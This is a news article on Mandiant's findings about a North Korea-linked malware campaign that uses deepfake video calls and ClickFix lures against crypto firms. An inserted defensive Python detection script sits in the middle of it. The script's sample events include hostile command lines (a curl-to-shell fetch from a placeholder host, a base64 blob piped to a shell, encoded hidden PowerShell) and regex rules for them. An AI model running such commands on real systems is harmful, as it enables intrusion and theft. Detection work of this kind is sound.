Google Cloud Identifies North Korea-Linked Crypto Malware Campaign

Mandiant, operating under Google Cloud, reported a surge in North Korea-linked social engineering attacks targeting crypto and fintech firms with new malware strains.

By Julia Sakovich
Google Cloud’s Mandiant flagged a North Korea-linked malware campaign targeting crypto firms | Photo: Unsplash

Google Cloud’s cybersecurity unit Mandiant has identified an expanded malware campaign linked to suspected North Korean threat actors targeting cryptocurrency and fintech companies. The operation, attributed to a cluster tracked as UNC1069, involves advanced social engineering tactics and the deployment of multiple malware families designed to extract sensitive data and digital assets.

According to Mandiant, the latest campaign deployed seven distinct malware strains, including newly identified tools named SILENCELIFT, DEEPBREATH, and CHROMEPUSH. The firm said the attackers used compromised Telegram accounts and staged Zoom meetings featuring AI-generated deepfake videos to lure victims into executing malicious commands. The approach reflects an escalation in both technical sophistication and operational scale.

AI-enabled Intrusion Tactics

Mandiant said the group has been active since at least 2018, but recent artificial intelligence tools have allowed it to broaden and automate elements of its social engineering playbook. In November 2025, investigators observed the first use of AI-enabled lures in active operations, including fabricated video calls designed to build credibility with targets.

In one documented case, attackers used a compromised Telegram account belonging to a crypto founder to arrange a virtual meeting. During the call, the perpetrator claimed to be experiencing audio issues and directed the victim to run troubleshooting commands. Hidden within those instructions was a command that initiated the infection chain, a tactic known as a ClickFix attack.
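The report does not publish the command used in that call, so the specifics of the lure are unknown here. What a defender can act on is the shape of the tactic: a user is talked into pasting a one-liner into a terminal, and that one-liner fetches and runs something. The script below is an added illustration, not code from the article or from Mandiant, of how an endpoint team could triage process-creation telemetry for that pattern. The event format, the rule names, the parent-process list and every sample command line are constructed assumptions; the download-and-execute and encoded-command heuristics are generic, not indicators from the report.

```python
import re

# Constructed process-creation events in a hypothetical EDR export format.
# None of these hosts, paths or URLs come from the Mandiant report.
SAMPLE_EVENTS = [
    {"host": "mac-01", "parent": "Terminal", "process": "/bin/zsh",
     "cmdline": 'zsh -c "curl -fsSL https://example.invalid/audiofix.sh | sh"'},
    {"host": "mac-01", "parent": "Terminal", "process": "/bin/zsh",
     "cmdline": 'zsh -c "echo aGVsbG8= | base64 -d | sh"'},
    {"host": "win-02", "parent": "cmd.exe", "process": "powershell.exe",
     "cmdline": "powershell -ep bypass -w hidden -enc QQBCAEMA"},
    {"host": "mac-03", "parent": "Terminal", "process": "/bin/zsh",
     "cmdline": 'zsh -c "ls -la ~/Library/Logs"'},
    {"host": "win-04", "parent": "cmd.exe", "process": "ping.exe",
     "cmdline": "ping -n 4 8.8.8.8"},
]

# Generic heuristics for commands a victim is coached into pasting. These are
# assumptions about the ClickFix pattern in general, not the campaign's commands.
RULES = {
    # curl/wget output piped straight into an interpreter
    "remote_script_piped_to_interpreter": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|python3?|perl)\b",
        re.IGNORECASE),
    # base64-decoded blob piped into a shell
    "base64_decoded_into_shell": re.compile(
        r"\bbase64\s+(?:-d|--decode)\b[^|]*\|\s*(?:sh|bash|zsh)\b",
        re.IGNORECASE),
    # PowerShell launched with an encoded command, hidden window, or policy bypass
    "powershell_encoded_or_hidden": re.compile(
        r"(?:^|\s)-(?:e|enc|encodedcommand)\s"
        r"|(?:^|\s)-w(?:indowstyle)?\s+hidden\b"
        r"|-ep\s+bypass\b",
        re.IGNORECASE),
}

# Parents that indicate a human typed or pasted the command (assumed list).
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "cmd.exe", "WindowsTerminal.exe"}


def flag_clickfix_events(events):
    """Return one finding per event whose command line matches any rule.

    Each finding records which rules fired and whether the parent process
    suggests the command was pasted by a user, which is the ClickFix hallmark.
    """
    findings = []
    for ev in events:
        hits = [name for name, rx in RULES.items() if rx.search(ev["cmdline"])]
        if not hits:
            continue
        findings.append({
            "host": ev["host"],
            "parent": ev["parent"],
            "process": ev["process"],
            "rules": hits,
            "user_pasted": ev["parent"] in INTERACTIVE_PARENTS,
        })
    return findings


if __name__ == "__main__":
    for finding in flag_clickfix_events(SAMPLE_EVENTS):
        print(finding)
```

On the constructed sample the first three events are flagged and the two benign commands are not. In practice the command-line patterns are the noisy part and the parent-process context is what makes a hit worth a phone call: a developer's build script piping curl into sh from CI looks very different from the same one-liner typed into a terminal minutes after a video call.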

The newly discovered malware strains are engineered to bypass core operating system protections and harvest browser data, authentication credentials, and other sensitive information. Mandiant said the campaign primarily targeted crypto exchanges, software developers, and venture capital firms with exposure to digital assets.

Institutional Risk and Geopolitical Backdrop

The findings underscore ongoing cybersecurity risks facing the digital asset sector, particularly as crypto firms handle large volumes of capital with relatively lean security teams. North Korea-linked actors have been repeatedly accused by US and allied authorities of using cybercrime to generate revenue amid international sanctions.

High-profile incidents in recent years, including large-scale exchange hacks and infiltration of crypto startups by fraudulent developers, have heightened institutional scrutiny. Security experts say the integration of AI into phishing and impersonation campaigns lowers operational barriers and increases the potential attack surface.

For institutional investors and infrastructure providers, the report reinforces the need for enhanced identity verification, endpoint monitoring and employee training. As digital asset markets mature and attract more traditional financial participants, cybersecurity remains a critical pillar of operational resilience and regulatory confidence.
